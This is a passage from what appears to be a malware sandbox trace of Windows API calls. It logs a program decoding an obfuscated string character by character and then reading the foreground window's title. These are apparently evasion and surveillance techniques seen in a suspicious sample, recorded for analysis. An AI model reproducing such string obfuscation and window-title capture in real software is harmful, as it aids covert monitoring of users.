cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0165.690] VarSub (in: pvarLeft=0x28f9f8, pvarRight=0x28f990, pvarResult=0x28f9c0 | out: pvarResult=0x28f9c0) returned 0x0 [0165.691] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x11596fc, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0165.691] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f9c0 | out: pvarResult=0x28f9c0) returned 0x0 [0165.691] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f926, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0165.691] VarSub (in: pvarLeft=0x28f9f8, pvarRight=0x28f990, pvarResult=0x28f9c0 | out: pvarResult=0x28f9c0) returned 0x0 [0165.691] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0165.692] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f9c0 | out: pvarResult=0x28f9c0) returned 0x0 [0165.692] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f926, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0165.692] VarSub (in: pvarLeft=0x28f9f8, pvarRight=0x28f990, pvarResult=0x28f9c0 | out: pvarResult=0x28f9c0) returned 0x0 [0165.692] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0x115979c, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0165.692] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f9c0 | out: pvarResult=0x28f9c0) returned 0x0 [0165.693] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f926, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0165.693] VarSub (in: pvarLeft=0x28f9f8, pvarRight=0x28f990, pvarResult=0x28f9c0 | out: pvarResult=0x28f9c0) returned 0x0 [0165.693] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x11596fc, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0165.693] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f9c0 | out: pvarResult=0x28f9c0) returned 0x0 [0165.694] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f926, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0165.694] VarSub (in: pvarLeft=0x28f9f8, pvarRight=0x28f990, pvarResult=0x28f9c0 | out: pvarResult=0x28f9c0) returned 0x0 [0165.694] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0165.694] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f9c0 | out: pvarResult=0x28f9c0) returned 0x0 [0165.695] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x28f926, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0165.695] VarSub (in: pvarLeft=0x28f9f8, pvarRight=0x28f990, pvarResult=0x28f9c0 | out: pvarResult=0x28f9c0) returned 0x0 [0165.695] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="f", cbMultiByte=1, lpWideCharStr=0x115979c, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0165.695] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f9c0 | out: pvarResult=0x28f9c0) returned 0x0 [0165.695] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f926, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0165.696] VarSub (in: pvarLeft=0x28f9f8, pvarRight=0x28f990, pvarResult=0x28f9c0 | out: pvarResult=0x28f9c0) returned 0x0 [0165.696] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0165.696] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f9c0 | out: pvarResult=0x28f9c0) returned 0x0 [0165.696] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f926, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0165.696] VarSub (in: pvarLeft=0x28f9f8, pvarRight=0x28f990, pvarResult=0x28f9c0 | out: pvarResult=0x28f9c0) returned 0x0 [0165.697] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x115979c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0165.697] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f9c0 | out: pvarResult=0x28f9c0) returned 0x0 [0165.697] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f926, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0165.697] VarSub (in: pvarLeft=0x28f9f8, pvarRight=0x28f990, pvarResult=0x28f9c0 | out: pvarResult=0x28f9c0) returned 0x0 [0165.697] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0165.697] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f9c0 | out: pvarResult=0x28f9c0) returned 0x0 [0165.698] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f926, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0165.698] VarSub (in: pvarLeft=0x28f9f8, pvarRight=0x28f990, pvarResult=0x28f9c0 | out: pvarResult=0x28f9c0) returned 0x0 [0165.698] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x115979c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0165.698] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f9c0 | out: pvarResult=0x28f9c0) returned 0x0 [0165.699] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f926, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0165.699] VarSub (in: pvarLeft=0x28f9f8, pvarRight=0x28f990, pvarResult=0x28f9c0 | out: pvarResult=0x28f9c0) returned 0x0 [0165.699] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0165.699] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f9c0 | out: pvarResult=0x28f9c0) returned 0x0 [0165.699] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f926, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0165.700] VarSub (in: pvarLeft=0x28f9f8, pvarRight=0x28f990, pvarResult=0x28f9c0 | out: pvarResult=0x28f9c0) returned 0x0 [0165.700] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x115979c, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0165.700] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f9c0 | out: pvarResult=0x28f9c0) returned 0x0 [0165.700] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr="user32", cbMultiByte=6, lpWideCharStr=0x28e8d4, cchWideChar=2047 | out: lpWideCharStr="user32\x03̀膰Ė") returned 6 [0165.701] SysReAllocStringLen (in: pbstr=0x28f90c*=0x0, psz="user32", len=0x6 | out: pbstr=0x28f90c*="user32") returned 1 [0165.701] CharLowerBuffW (in: lpsz="user32", cchLength=0x6 | out: lpsz="user32") returned 0x6 [0165.701] GetModuleHandleA (lpModuleName="user32") returned 0x75980000 [0165.701] GetProcAddress (hModule=0x75980000, lpProcName="GetForegroundWindow") returned 0x759a2320 [0165.702] GetForegroundWindow () returned 0x102c2 [0165.789] GetLastError () returned 0x0 [0165.789] SysStringLen (param_1=" ") returned 0xff [0165.789] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=255, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 255 [0165.789] SysStringLen (param_1=" ") returned 0xff [0165.789] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=256, lpMultiByteStr=0x11644c4, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" ", lpUsedDefaultChar=0x0) returned 256 [0165.790] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr="user32", cbMultiByte=6, lpWideCharStr=0x28e8c8, cchWideChar=2047 | out: lpWideCharStr="user32user32\x03̀膰Ė") returned 6 [0165.790] SysReAllocStringLen (in: pbstr=0x28f900*=0x0, psz="user32", len=0x6 | out: pbstr=0x28f900*="user32") returned 1 [0165.790] CharLowerBuffW (in: lpsz="user32", cchLength=0x6 | out: lpsz="user32") returned 0x6 [0165.790] GetModuleHandleA (lpModuleName="user32") returned 0x75980000 [0165.790] GetProcAddress (hModule=0x75980000, lpProcName="GetWindowTextA") returned 0x759a0029 [0165.791] GetWindowTextA (in: hWnd=0x102c2, lpString=0x11644c4, nMaxCount=255 | out: lpString="Activity Arrive Event") returned 21 [0165.875] GetLastError () returned 0x0 [0165.875] SysStringByteLen (bstr="捁楴楶祴䄠牲癩⁥癅湥t†††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0165.876] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Activity Arrive Event", cbMultiByte=255, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 255 [0165.876] SysStringByteLen (bstr="捁楴楶祴䄠牲癩⁥癅湥t†††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0165.876] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Activity Arrive Event", cbMultiByte=256, lpWideCharStr=0x114bcc4, cchWideChar=511 | out: lpWideCharStr="Activity Arrive Event") returned 256 [0165.876] SysStringLen (param_1="Ac") returned 0x2 [0165.876] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Ac", cchWideChar=3, lpMultiByteStr=0x11596fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Ac", lpUsedDefaultChar=0x0) returned 3 [0165.876] SetWindowTextA (hWnd=0x103c4, lpString="Ac") returned 1 [0165.877] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x5 [0165.877] GetFocus () returned 0x0 [0165.878] lstrlenA (lpString="Ac") returned 2 [0165.878] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xc, wParam=0x0, lParam=0x11596fc) returned 0x1 [0165.884] IsWindow (hWnd=0x103c4) returned 1 [0165.885] IsWindow (hWnd=0x103c4) returned 1 [0165.885] IsWindow (hWnd=0x103c4) returned 1 [0165.885] IsWindow (hWnd=0x103c4) returned 1 [0165.885] GetFocus () returned 0x0 [0165.887] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x2 [0165.888] GetFocus () returned 0x0 [0165.889] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x3) returned 0x10ebcd0 [0165.889] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xd, wParam=0x3, lParam=0x10ebcd0) returned 0x2 [0165.889] GetFocus () returned 0x0 [0165.890] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Ac", cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 3 [0165.890] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Ac", cbMultiByte=-1, lpWideCharStr=0x11596fc, cchWideChar=3 | out: lpWideCharStr="Ac") returned 3 [0165.890] HeapFree (in: hHeap=0x10d0000, dwFlags=0x0, lpMem=0x10ebcd0 | out: hHeap=0x10d0000) returned 1 [0165.890] VarBstrCmp (bstrLeft="Ac", bstrRight="S ", lcid=0x0, dwFlags=0x30001) returned 0x0 [0165.893] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="d", cchWideChar=1, lpMultiByteStr=0x28f8c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="d\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0165.893] VarSub (in: pvarLeft=0x28f9d8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0165.893] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="W", cbMultiByte=1, lpWideCharStr=0x11596fc, cchWideChar=1 | out: lpWideCharStr="W") returned 1 [0165.893] VarCat (in: pvarLeft=0x28f9f8, pvarRight=0x28f9b0, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0165.894] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="v", cchWideChar=1, lpMultiByteStr=0x28f8c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="v\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0165.894] VarSub (in: pvarLeft=0x28f9d8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0165.894] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="i", cbMultiByte=1, lpWideCharStr=0x115979c, cchWideChar=1 | out: lpWideCharStr="i") returned 1 [0165.894] VarCat (in: pvarLeft=0x28f9f8, pvarRight=0x28f9b0, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0165.894] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f8c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0165.894] VarSub (in: pvarLeft=0x28f9d8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0165.895] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0165.895] VarCat (in: pvarLeft=0x28f9f8, pvarRight=0x28f9b0, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0165.895] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f8c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0165.895] VarSub (in: pvarLeft=0x28f9d8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0165.895] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0x11596fc, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0165.896] VarCat (in: pvarLeft=0x28f9f8, pvarRight=0x28f9b0, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0165.896] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f8c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0165.896] VarSub (in: pvarLeft=0x28f9d8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0165.896] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x115979c, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0165.896] VarCat (in: pvarLeft=0x28f9f8, pvarRight=0x28f9b0, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0165.897] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f8c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0165.897] VarSub (in: pvarLeft=0x28f9d8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0165.897] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0165.897] VarCat (in: pvarLeft=0x28f9f8, pvarRight=0x28f9b0, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0165.898] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f8c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0165.898] VarSub (in: pvarLeft=0x28f9d8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0165.898] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x11596fc, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0165.898] VarCat (in: pvarLeft=0x28f9f8, pvarRight=0x28f9b0, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0165.898] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f8c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0165.899] VarSub (in: pvarLeft=0x28f9d8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0165.899] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x115979c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0165.899] VarCat (in: pvarLeft=0x28f9f8, pvarRight=0x28f9b0, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0165.899] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="a", cchWideChar=1, lpMultiByteStr=0x28f8c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="a\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0165.899] VarSub (in: pvarLeft=0x28f9d8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0165.900] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="T", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="T") returned 1 [0165.900] VarCat (in: pvarLeft=0x28f9f8, pvarRight=0x28f9b0, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0165.900] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="n", cchWideChar=1, lpMultiByteStr=0x28f8c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="n\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0165.900] VarSub (in: pvarLeft=0x28f9d8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0165.900] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="a", cbMultiByte=1, lpWideCharStr=0x11596fc, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0165.901] VarCat (in: pvarLeft=0x28f9f8, pvarRight=0x28f9b0, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0165.901] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f8c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0165.901] VarSub (in: pvarLeft=0x28f9d8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0165.901] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x115979c, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0165.901] VarCat (in: pvarLeft=0x28f9f8, pvarRight=0x28f9b0, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0165.902] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="x", cchWideChar=1, lpMultiByteStr=0x28f8c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="x\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0165.902] VarSub (in: pvarLeft=0x28f9d8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0165.902] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="k", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="k") returned 1 [0165.902] VarCat (in: pvarLeft=0x28f9f8, pvarRight=0x28f9b0, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0165.903] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f8c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0165.903] VarSub (in: pvarLeft=0x28f9d8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0165.903] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x11596fc, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0165.903] VarCat (in: pvarLeft=0x28f9f8, pvarRight=0x28f9b0, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0165.904] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Z", cchWideChar=1, lpMultiByteStr=0x28f8c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Z\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0165.904] VarSub (in: pvarLeft=0x28f9d8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0165.904] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="M", cbMultiByte=1, lpWideCharStr=0x115979c, cchWideChar=1 | out: lpWideCharStr="M") returned 1 [0165.904] VarCat (in: pvarLeft=0x28f9f8, pvarRight=0x28f9b0, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0165.904] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="n", cchWideChar=1, lpMultiByteStr=0x28f8c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="n\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0165.905] VarSub (in: pvarLeft=0x28f9d8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0165.905] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="a", cbMultiByte=1, lpWideCharStr=0x11596fc, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0165.905] VarCat (in: pvarLeft=0x28f9f8, pvarRight=0x28f9b0, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0165.905] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f8c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0165.906] VarSub (in: pvarLeft=0x28f9d8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0165.906] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x115979c, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0165.906] VarCat (in: pvarLeft=0x28f9f8, pvarRight=0x28f9b0, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0165.906] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="n", cchWideChar=1, lpMultiByteStr=0x28f8c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="n\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0165.906] VarSub (in: pvarLeft=0x28f9d8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0165.906] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="a", cbMultiByte=1, lpWideCharStr=0x11596fc, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0165.907] VarCat (in: pvarLeft=0x28f9f8, pvarRight=0x28f9b0, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0165.907] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="t", cchWideChar=1, lpMultiByteStr=0x28f8c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="t\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0165.907] VarSub (in: pvarLeft=0x28f9d8, pvarRight=0x28f960, pvarResult=0x28f990 | out: pvarResult=0x28f990) returned 0x0 [0165.907] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="g", 